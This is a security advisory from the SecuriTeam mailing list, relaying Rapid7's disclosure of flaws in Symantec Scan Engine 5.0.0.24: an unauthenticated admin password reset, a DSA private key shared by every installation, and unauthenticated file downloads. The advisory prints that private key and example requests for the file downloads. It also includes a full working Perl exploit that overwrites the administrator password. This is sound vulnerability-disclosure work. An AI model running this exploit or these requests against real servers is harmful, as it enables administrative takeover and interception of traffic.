[NT] Symantec Scan Engine Multiple Vulnerabilities

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Symantec Scan Engine Multiple Vulnerabilities
------------------------------------------------------------------------


SUMMARY

Symantec AntiVirus Scan Engine provides fast, scalable, and reliable virus 
protection for traffic served through, or stored on, network 
infrastructure devices.

Improper authentication validation and the use of a fixed private key, 
allows attackers to gain administrative privileges, gain information on 
the system and bypass DSA encryption.

DETAILS

Vulnerable Systems:
 * Symantec Scan Engine version 5.0.0.24

Immune Systems:
 * Symantec Scan Engine version 5.1.0.7

Authentication Bypass:
Symantec Scan Engine provides a web-based administrative interface that is 
used for managing scanning options and antivirus definitions. To access 
the interface, an administrator must browse to it, load a Java applet, and 
log in with a password.

However, the authentication mechanism used by Symantec Scan Engine 
contains a fundamental design flaw that allows any remote user to gain 
full administrative access to the server. The server does not verify the 
password entered by the user. The password is only verified by the 
client-side Java applet. Anyone with knowledge of the underlying 
communication mechanism can exercise full control of the Scan Engine 
server simply by posting XML requests to the server using its proprietary 
protocol.

The administrative web interface, which is typically accessible on default 
TCP port 8004, is implemented as a Java applet. Also, an additional SSL 
connection to TCP port 8005 is used by the applet to exchange 
configuration information with the server using a proprietary protocol 
based on XML exchanges. The authentication model used by the 
administrative interface is utterly flawed, because the server trusts the 
client applet to correctly authenticate users. The protocols themselves 
(HTTP on port 8004 and proprietary protocol on port 8005) do NOT require 
client authentication.

For example, when an administrator user changes his password via the 
administrative interface, the Java applet simply connects to port 8005 and 
sends a request to change the administrator password hash.
No authentication is required. The direct consequence of this is that any 
remote attacker can change the administrator password to a password of his 
choice.

By using the tool  change_scan_engine_pw.pl  that is included with this 
advisory there is a way to change the administrative password:

Proof of Concept:
   $ ./change_scan_engine_pw.pl --pwd foobar 10.68.4.4
   Old hash:
E97B788686921D991B3179F1E8CCA6491D3714F2F3EC2ADE399CB71A828090AF
   New hash:
656268BDDE60892B3B5D92781E79C05031E2B48F3D222EB8A71D507FAB2E9EB0
   Password successfully set to: 'foobar'
   $ ./change_scan_engine_pw.pl \
   --hash E97B788686921D991B3179F1E8CCA6491D3714F2F3EC2ADE399CB71A828090AF
\
   10.68.4.4
   Old hash:
656268BDDE60892B3B5D92781E79C05031E2B48F3D222EB8A71D507FAB2E9EB0
   New hash:
E97B788686921D991B3179F1E8CCA6491D3714F2F3EC2ADE399CB71A828090AF

The first command resets the administrator password to 'foobar': it asks 
Scan Engine for the current administrator password hash (E97B...) for 
information purpose only (the attack does not actually require knowledge 
of the previous password hash), computes the hash corresponding to the new 
password (6562...), and uploads this new hash. The second command just 
restores the previous password (which is unknown) by re-uploading the 
previous hash (E97B...) to the server.

Note: the 256-bit password hash is computed using the following algorithm. 
First, a random 128-bit salt is chosen. Second, a character string is 
built by concatenating the password string and the uppercase hexadecimal 
representation of the salt. Third, the 128-bit MD5 digest of this 
concatenated string is computed. Finally the 256-bit password hash is 
built by concatenating the 128-bit MD5 digest and the 128-bit salt.

Immutable DSA Private Key:
Symantec Scan Engine exhibits a vulnerability in the way it generates the 
SSL private key used for protecting communications over TCP port 8005. 
This port is used to exchange sensitive configuration and control commands 
between the server and the administrative control application.

While all data over this port is protected using SSL, Rapid7 has found 
that every installation of Symantec Scan Engine uses the same private DSA 
key. This immutable key cannot be changed by end users and can be 
extracted easily from any installation of this product.

This design flaw renders the SSL protection useless. A man-in-the-middle 
attacker could easily intercept and decrypt all communications between 
Symantec Scan Engine and an administrative client.

Symantec Scan Engine's administrative client exchanges sensitive 
configuration information with the server using a proprietary protocol 
protected by SSL which runs by default on TCP port 8005.
This built-in SSL server is used, for example, to transmit the 
administrator password hash when changing the password. It is crucial for 
this communication channel to remain private, authenticated, and reliable.

A critical design error has been made in the way SSL protection is 
employed. The use of a particular DSA private key, pre-generated by 
Symantec, is enforced in their SSL server in all tested versions of 
Symantec Scan Engine. End users are offered no way to change the key, and 
the key itself can be relatively easily extracted from any installation. 
The key can be found in the file "servers.jar" (located by default in 
"C:\Program Files\Symantec\Scan Engine"), which contains a java keystore 
file "com/symantec/jsse/serverKeys" protected by the password "secret". 
The key entry is stored under the alias "server" and is protected by the 
password "secret".

This known immutable key renders SSL protection useless since the private 
key is known to anybody (see below for the key in PEM format). All Scan 
Engine installations use the same key. For example, attackers can combine 
ARP or DNS spoofing attacks with the knowledge of the private key to 
conduct man-in-the-middle attacks.

   -----BEGIN DSA PRIVATE KEY-----
   MIIBuwIBAAKBgQD9f1OBHXUSKVLfSpwu7OTn9hG3UjzvRADDHj+AtlEmaUVdQCJR
   +1k9jVj6v8X1ujD2y5tVbNeBO4AdNG/yZmC3a5lQpaSfn+gEexAiwk+7qdf+t8Yb
   +DtX58aophUPBPuD9tPFHsMCNVQTWhaRMvZ1864rYdcq7/IiAxmd0UgBxwIVAJdg
   UI8VIwvMspK5gqLrhAvwWBz1AoGBAPfhoIXWmz3ey7yrXDa4V7l5lK+7+jrqgvlX
   TAs9B4JnUVlXjrrUWU/mcQcQgYC0SRZxI+hMKBYTt88JMozIpuE8FnqLVHyNKOCj
   rh4rs6Z1kW6jfwv6ITVi8ftiegEkO8yk8b6oUZCJqIPf4VrlnwaSi2ZegHtVJWQB
   TDv+z0kqAoGAE9rKDKa4eOROFXX1/jy7sLH34OGTbTmsqYoEBTJt8DolJkr6L4kf
   SyOzpIhKB440mmXZMQJbXy0WNBCGzPjq6OHpI60KuBTskWAtPBEGE1jiov/7jK9b
   wCt6sTBqo3Ux5ygyjuFQyt89d+qTp9761Z32OvaBq+IJvZYWNM8M/2ECFDLgCI85
   fJtA3mlq9Q1T6U36Kl7x
   -----END DSA PRIVATE KEY-----

The private component of this DSA key is X:

X = 0x32e0088f397c9b40de696af50d53e94dfa2a5ef1

A tool such as ssldump can be used to confirm the validity of the private 
key as shown above, by manually comparing its public part to the DSA 
public key embedded in the SSL server's certificate displayed by ssldump.

File Disclosure:
There is a vulnerability in Symantec Scan Engine which allows 
unauthenticated remote users to download any file located under the 
Symantec Scan Engine installation directory. For instance the 
configuration file, the scanning logs, as well as the current virus 
definitions can all be accessed by any remote user using regular or 
specially crafted HTTP requests.

Symantec Scan Engine stores multiple files inside its web root (the 
default directory is "C:\Program Files\Symantec\Scan Engine"). Most of the 
files are accessible by any unauthenticated user via regular URLs. For 
example the following URLs will download the log and corresponding data 
file for October 17th, 2005:

      http://x.x.x.x:8004/log/SSE20051017.log
      http://x.x.x.x:8004/log/SSE20051017.dat

In the same way, virus definitions can be accessed from:

      http://x.x.x.x:8004/Definitions/AntiVirus/VirusDefs/VIRSCAN1.DAT
      http://x.x.x.x:8004/Definitions/AntiVirus/VirusDefs/VIRSCAN2.DAT

Such sensitive knowledge of installed virus definitions will allow an 
attacker to determine what viruses can be used to infect the network 
without detection.

Files ending with the '.xml' extension are protected by the HTTP daemon. 
However, the protection can be easily defeated by appending a trailing 
backslash to the filename. For example the configuration file 
configuration.xml, which contains the administrator's password hash, can 
be accessed by the following HTTP request:

      GET /configuration.xml\ HTTP/1.0

The above request will yield the following configuration snippet:

   <system>
    <TempDir value="C:\Program Files\Symantec\Scan Engine\temp\"/>
    [...]
    <InstallDir value="C:\Program Files\Symantec\Scan Engine\"/>
    <LoadMaximumQueuedClients value="100"/>
    <admin>
    <port value="8004"/>
    <sslport value="8005"/>
    <ip value=""/>
    <timeout value="300"/>
    <password value=
     "8369951FB31356D389FBEE4B52F6A7BB51AAE8FBE4B8DB29D249F347C3426D19"/>
    </admin>
   </system>

CVE Information:
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0230> 
CVE-2006-0230
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0231> 
CVE-2006-0231
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0232> 
CVE-2006-0232

Tool:
#!/usr/bin/perl -w
#
# Remotely change the administrator password (or password hash) of
# Symantec Scan Engine.
#
# Author: Marc Bevand of Rapid7 <marc_bevand(at)rapid7.com>
# Copyright 2006 Rapid7, LLC. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
#   1. Redistributions of source code must retain the above copyright
#   notice, this list of conditions and the following disclaimer.
#
#   2. Redistributions in binary form must reproduce the above
#   copyright notice, this list of conditions and the following
#   disclaimer in the documentation and/or other materials provided
#   with the distribution.
#
#   THIS SOFTWARE IS PROVIDED BY RAPID7, LLC ``AS IS'' AND ANY EXPRESS
#   OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
#   WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
#   ARE DISCLAIMED. IN NO EVENT SHALL RAPID7, LLC BE LIABLE FOR ANY
#   DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
#   DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
#   GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
#   INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
#   WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
#   NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
#   SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#

use strict;
use Getopt::Long;
use LWP::UserAgent;
use Digest::MD5 qw/md5_hex/;
use Net::SSLeay::Handle qw/shutdown/;

#
# Init LWP::UserAgent (the user agent string is the one currently used
# by the Scan Engine java applet).
#
sub init {
   my $ua;
   $ua = LWP::UserAgent->new(keep_alive => 0);
   $ua->agent("Mozilla/4.0 (Windows 2000 5.0) Java/1.4.2_08");
   return $ua;
}

#
# Example of service string to be parsed:
# 10.68.4.4
# 10.68.4.4/8004/8005
# hostname
# hostname/9004/9005
#
sub parse_service {
   my ($service) = @_;

   if ($service =~ m{^([^/]*)/(\d+)/(\d+)$}) {
      return $1, $2, $3;
   } elsif ($service =~ m{^([^/]*)$}) {
      return $1, 8004, 8005;
   } else {
      die "cannot parse service: $service";
   }
}

#
# Sends a request to obtain the password hash. Note: the RSA key
# (modulus and public exponent) has been randomly chosen.
#
sub data_to_send {
   my $r1 =
   '<request><key mod="784607708866372110095636553206565253692059085'.
   '0882661452379500719255245078226751123858547991180612629396444366'.
   '109364669329014831409765373165312900564995261" pub="754297542068'.
   '3822223796790522532950961415568940207500046396606172395479254814'.
   '3383744922039888710333203519260280729415961892539564611703079983'.
   '74406014351745">I need the key</key></request>'
   ;

   return $r1;
}

#
# Example of response to be parsed:
# <request>
#   <message xmlns:xs="http://www.w3.org/2001/XMLSchema";
#     xmlns:java="class:com.symantec.common.SimpleRSA"
#     value="01234567890123456789012345678901234567890123456789012345\
# 6789"/>
#   <password xmlns:xs="http://www.w3.org/2001/XMLSchema";
#     xmlns:java="class:com.symantec.common.SimpleRSA"
#     pass="86B7A1FE120C0279971559B6BAC8C5713EF580BAFD20168D622B7E170\
# D248642"/>
# </request>
#
sub parse_resp {
   my ($res) = @_;

   if ($res =~ /pass="([[:xdigit:]]{64})"/) {
      return $1;
   } else {
      die "cannot parse response: $res";
   }
}

#
# Return a password hash.
#
sub hash_passwd {
   my ($pwd) = @_;
   my $salt = sprintf "%08X%08X%08X%08X", rand(0xffffffff),
   rand(0xffffffff), rand(0xffffffff), rand(0xffffffff);

   return uc(md5_hex("$pwd$salt")) . $salt;
}

sub send_request {
   my ($socket, $req) = @_;

   $req = pack("n", length($req)).$req;
   print $socket $req;
}

#
# Set the administrator password hash.
#
sub set_hash {
   my ($hostname, $port_ssl, $hash) = @_;
   my $socket;
   my $reply;

   tie(*SSL, "Net::SSLeay::Handle", $hostname, $port_ssl)
      or die "ssl tie: $!";
   $socket = \*SSL;
   send_request($socket,
      '<request command="submit" parms="apply" type="saveapply">'.
      '<![CDATA[<?xml version="1.0" encoding="UTF-8"?>'.
      '<guichanges><configuration>'.
      '<changes xpath="//admin/password/@value" value="'.$hash.'"/>'.
      '</configuration></guichanges>'.
      ']]></request>');
   send_request($socket,
      'UTFWritesDone');
   shutdown($socket, 1) or die "ssl shutdown: $!";
   $reply = substr(<$socket>, 2);
   $reply = substr($reply, 0, index($reply, 'UTFWritesDone') - 2);
   if ($reply !~ m{<message status='apply_success'>Apply!</message>})
   {
      die "command failed: $reply";
   }
   close($socket) or die "ssl close: $!";
}

sub doit {
   my ($service, $pwd, $hash) = @_;
   my $hostname;
   my $port_http;
   my $port_ssl;
   my $ua;
   my $url;
   my $req;
   my $res;
   my $old_hash;

   ($hostname, $port_http, $port_ssl) = parse_service($service);
   $ua = init();
   $url = "http://$hostname:$port_http/xml.xml";;
   $req = HTTP::Request->new(POST => $url);
   $req->content_type('application/x-www-form-urlencoded');
   $req->content(data_to_send());
   $res = $ua->request($req);
   $res->is_success or die "got ".$res->status_line." for $url\n";
   ($old_hash) = parse_resp($res->content);
   print "Old hash: $old_hash\n";
   if ($hash) {
      set_hash($hostname, $port_ssl, $hash);
      print "New hash: $hash\n";
   } else {
      $hash = hash_passwd($pwd);
      set_hash($hostname, $port_ssl, $hash);
      print "New hash: $hash\n";
      print "Password successfully set to: '$pwd'\n";
   }
}

sub error {
   print STDERR "Try `$0 --help' for more information.\n";
}

sub usage {
   print "Usage:\n".
   "  $0 [OPTIONS] <hostname>\n".
   "  $0 [OPTIONS] <hostname>/<http_port>/<ssl_port>\n".
   "Options:\n".
   "  --help                Display this help\n".
   "  --pwd <passwd>        Set the password (default: test)\n".
   "  --hash <passwd_hash>  Set the password hash instead of a parti".
   "cular password\n".
   "Examples:\n".
   "  $0 10.68.4.4\n".
   "  $0 --pwd foobar 10.68.4.4/8004/8005\n".
   "";
}

sub main {
   my $help;
   my $pwd = "test";
   my $hash;
   my $service;

   if (!GetOptions(
         "help" => \$help,
         "pwd=s" => \$pwd,
         "hash=s" => \$hash,
      )) {
      error(); exit(1);
   }
   if ($help) {
      usage(); exit(0);
   }
   if (!scalar(@ARGV)) {
      print STDERR "No service specified.\n";
      error(); exit(1);
   } elsif (1 == scalar(@ARGV)) {
      $service = $ARGV[0];
   } else {
      print STDERR "Extra argument: $ARGV[1]\n";
      error(); exit(1);
   }
   doit($service, $pwd, $hash);
}

main();

#
# END proof of concept
#


ADDITIONAL INFORMATION

The information has been provided by  <mailto:advisory@rapid7.com> rapid7.
The original article can be found at:  
<http://www.rapid7.com/advisories/R7-0021.html> 
http://www.rapid7.com/advisories/R7-0021.html,
 <http://www.rapid7.com/advisories/R7-0022.html> 
http://www.rapid7.com/advisories/R7-0022.html,
 <http://www.rapid7.com/advisories/R7-0023.html> 
http://www.rapid7.com/advisories/R7-0023.html



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.